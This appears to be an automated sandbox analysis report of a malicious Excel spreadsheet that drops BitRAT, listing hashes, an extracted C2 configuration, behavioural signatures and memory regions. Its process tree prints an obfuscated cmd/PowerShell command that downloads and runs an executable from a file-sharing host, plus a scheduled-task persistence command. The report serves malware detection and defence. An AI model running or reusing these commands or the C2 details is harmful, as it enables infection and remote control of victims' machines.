Analysis

  • max time kernel
    64s
  • max time network
    91s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-09-2023 15:10

General

  • Target

    Romania_Request_Imun_SRL_09_2023.xls

  • Size

    100KB

  • MD5

    d8c96466da14e352c8a11c86a61200fa

  • SHA1

    738380f30ec9f2448875dd97759bf49aa292cf46

  • SHA256

    896dd0f8a116edbf4f54be7fac310410467043ecbd86b2d4d66089f14bde6d01

  • SHA512

    d81aafbea2392976e331e00ca0cd5c4054f7aab57a640af8a15c6143846c828c0235f34a94721313dec400a8b0724111ed647865846971d33ccca7a57bf5f70c

  • SSDEEP

    3072:0rxEtjPOtioVjDGUU1qfDlaGGx+cL2QnA9tJE2zuxq+fr9wBLa71ba2ryLTHeY+:axEtjPOtioVjDGUU1qfDlavx+W2QnAnF

Score
10/10

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

185.225.75.68:3569

Attributes
  • communication_password

    0edcbe7d888380c49e7d1dcf67b6ea6e

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Romania_Request_Imun_SRL_09_2023.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1364
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/qyAOUa1rJz/Betro.e^xe -o C:\Users\Public\l6hv4.exe;C:\Users\Public\l6hv4.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2816
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/qyAOUa1rJz/Betro.exe -o C:\Users\Public\l6hv4.exe;C:\Users\Public\l6hv4.exe
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2404
        • C:\Users\Public\l6hv4.exe
          "C:\Users\Public\l6hv4.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:904
          • C:\Users\Public\l6hv4.exe
            "C:\Users\Public\l6hv4.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:2112
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c copy "C:\Users\Public\l6hv4.exe" "C:\Users\Admin\AppData\Roaming\uno\uno.exe"
            5⤵
              PID:4136
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\uno\uno.exe'" /f
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:5044
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\uno\uno.exe'" /f
                6⤵
                • Creates scheduled task(s)
                PID:3536
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\uno"
              5⤵
                PID:752
      • C:\Users\Admin\AppData\Roaming\uno\uno.exe
        C:\Users\Admin\AppData\Roaming\uno\uno.exe
        1⤵
        • Executes dropped EXE
        PID:2408

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o31go3hz.2kk.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\uno\uno.exe
        Filesize

        64KB

        MD5

        89bead60a6f809da390ce4063a399960

        SHA1

        53989713e50c0fd76e57a6897646383ce20d1ceb

        SHA256

        4a9367ec864deec16348ed0af7fd150545b726cf5ec14c8b74ff5a9e0c0f083e

        SHA512

        1c319ddda2950a204169c5270be88dc5fe3e10fe04bc60825d0c9b6881eff457697507417e9729ddd5e4ade90ecb8c9968fa5333d912d50800b7e4c7c219fcd2

      • C:\Users\Admin\AppData\Roaming\uno\uno.exe
        Filesize

        217KB

        MD5

        1c913d88a3774f36babdc06d360b3751

        SHA1

        9df24accb347280b2f92d2bb74dad463748e4dd2

        SHA256

        d2884f01c0987183458680dd0ff8d545f92b91d0651ae1200778014f5eb72af0

        SHA512

        6e572655ad226cd0187a72b877e143457cd17a9830a5d4a77ed724ed00a6306bc5e62d9c6f32c735a7803f5e2ec974a6d7d2a4d2d703c51de843a4a3d6ae766b

      • C:\Users\Admin\AppData\Roaming\uno\uno.exe
        Filesize

        7.6MB

        MD5

        1c9f3c0258e923c07e1943498c789a3d

        SHA1

        e908faaa5eff19c6b653241253ecc6f28c83f436

        SHA256

        925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55

        SHA512

        92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

      • C:\Users\Public\l6hv4.exe
        Filesize

        7.6MB

        MD5

        1c9f3c0258e923c07e1943498c789a3d

        SHA1

        e908faaa5eff19c6b653241253ecc6f28c83f436

        SHA256

        925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55

        SHA512

        92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

      • C:\Users\Public\l6hv4.exe
        Filesize

        7.6MB

        MD5

        1c9f3c0258e923c07e1943498c789a3d

        SHA1

        e908faaa5eff19c6b653241253ecc6f28c83f436

        SHA256

        925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55

        SHA512

        92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

      • C:\Users\Public\l6hv4.exe
        Filesize

        7.6MB

        MD5

        1c9f3c0258e923c07e1943498c789a3d

        SHA1

        e908faaa5eff19c6b653241253ecc6f28c83f436

        SHA256

        925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55

        SHA512

        92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

      • memory/904-63-0x0000000007B80000-0x000000000830A000-memory.dmp
        Filesize

        7.5MB

      • memory/904-61-0x00000000065D0000-0x0000000006B74000-memory.dmp
        Filesize

        5.6MB

      • memory/904-60-0x0000000000D50000-0x00000000014EC000-memory.dmp
        Filesize

        7.6MB

      • memory/904-59-0x00000000751C0000-0x0000000075970000-memory.dmp
        Filesize

        7.7MB

      • memory/904-62-0x0000000006010000-0x0000000006020000-memory.dmp
        Filesize

        64KB

      • memory/904-69-0x00000000751C0000-0x0000000075970000-memory.dmp
        Filesize

        7.7MB

      • memory/1364-23-0x000001A513F50000-0x000001A514750000-memory.dmp
        Filesize

        8.0MB

      • memory/1364-5-0x00007FFDCC690000-0x00007FFDCC885000-memory.dmp
        Filesize

        2.0MB

      • memory/1364-15-0x00007FFDCC690000-0x00007FFDCC885000-memory.dmp
        Filesize

        2.0MB

      • memory/1364-16-0x00007FFDCC690000-0x00007FFDCC885000-memory.dmp
        Filesize

        2.0MB

      • memory/1364-17-0x00007FFD8A6B0000-0x00007FFD8A6C0000-memory.dmp
        Filesize

        64KB

      • memory/1364-1-0x00007FFDCC690000-0x00007FFDCC885000-memory.dmp
        Filesize

        2.0MB

      • memory/1364-26-0x000001A513F50000-0x000001A514750000-memory.dmp
        Filesize

        8.0MB

      • memory/1364-12-0x00007FFD8A6B0000-0x00007FFD8A6C0000-memory.dmp
        Filesize

        64KB

      • memory/1364-0-0x00007FFD8C710000-0x00007FFD8C720000-memory.dmp
        Filesize

        64KB

      • memory/1364-2-0x00007FFD8C710000-0x00007FFD8C720000-memory.dmp
        Filesize

        64KB

      • memory/1364-14-0x00007FFDCC690000-0x00007FFDCC885000-memory.dmp
        Filesize

        2.0MB

      • memory/1364-4-0x00007FFDCC690000-0x00007FFDCC885000-memory.dmp
        Filesize

        2.0MB

      • memory/1364-41-0x00007FFDCC690000-0x00007FFDCC885000-memory.dmp
        Filesize

        2.0MB

      • memory/1364-42-0x00007FFDCC690000-0x00007FFDCC885000-memory.dmp
        Filesize

        2.0MB

      • memory/1364-43-0x000001A513F50000-0x000001A514750000-memory.dmp
        Filesize

        8.0MB

      • memory/1364-44-0x000001A513F50000-0x000001A514750000-memory.dmp
        Filesize

        8.0MB

      • memory/1364-3-0x00007FFD8C710000-0x00007FFD8C720000-memory.dmp
        Filesize

        64KB

      • memory/1364-6-0x00007FFD8C710000-0x00007FFD8C720000-memory.dmp
        Filesize

        64KB

      • memory/1364-7-0x00007FFDCC690000-0x00007FFDCC885000-memory.dmp
        Filesize

        2.0MB

      • memory/1364-13-0x00007FFDCC690000-0x00007FFDCC885000-memory.dmp
        Filesize

        2.0MB

      • memory/1364-8-0x00007FFD8C710000-0x00007FFD8C720000-memory.dmp
        Filesize

        64KB

      • memory/1364-11-0x00007FFDCC690000-0x00007FFDCC885000-memory.dmp
        Filesize

        2.0MB

      • memory/1364-10-0x00007FFDCC690000-0x00007FFDCC885000-memory.dmp
        Filesize

        2.0MB

      • memory/1364-9-0x00007FFDCC690000-0x00007FFDCC885000-memory.dmp
        Filesize

        2.0MB

      • memory/2112-86-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-83-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-106-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-64-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-105-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-67-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-66-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-103-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-70-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-102-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-74-0x00000000750D0000-0x0000000075109000-memory.dmp
        Filesize

        228KB

      • memory/2112-75-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-76-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-77-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-78-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-79-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-80-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-81-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-82-0x0000000075490000-0x00000000754C9000-memory.dmp
        Filesize

        228KB

      • memory/2112-101-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-84-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-85-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-100-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-90-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-91-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-92-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-93-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-94-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-96-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-97-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-98-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2112-99-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2404-39-0x000001D1EA080000-0x000001D1EA090000-memory.dmp
        Filesize

        64KB

      • memory/2404-57-0x00007FFDA0CA0000-0x00007FFDA1761000-memory.dmp
        Filesize

        10.8MB

      • memory/2404-40-0x000001D1EA080000-0x000001D1EA090000-memory.dmp
        Filesize

        64KB

      • memory/2404-45-0x00007FFDA0CA0000-0x00007FFDA1761000-memory.dmp
        Filesize

        10.8MB

      • memory/2404-46-0x000001D1EA080000-0x000001D1EA090000-memory.dmp
        Filesize

        64KB

      • memory/2404-49-0x000001D1EA080000-0x000001D1EA090000-memory.dmp
        Filesize

        64KB

      • memory/2404-38-0x00007FFDA0CA0000-0x00007FFDA1761000-memory.dmp
        Filesize

        10.8MB

      • memory/2404-37-0x000001D1EA090000-0x000001D1EA0B2000-memory.dmp
        Filesize

        136KB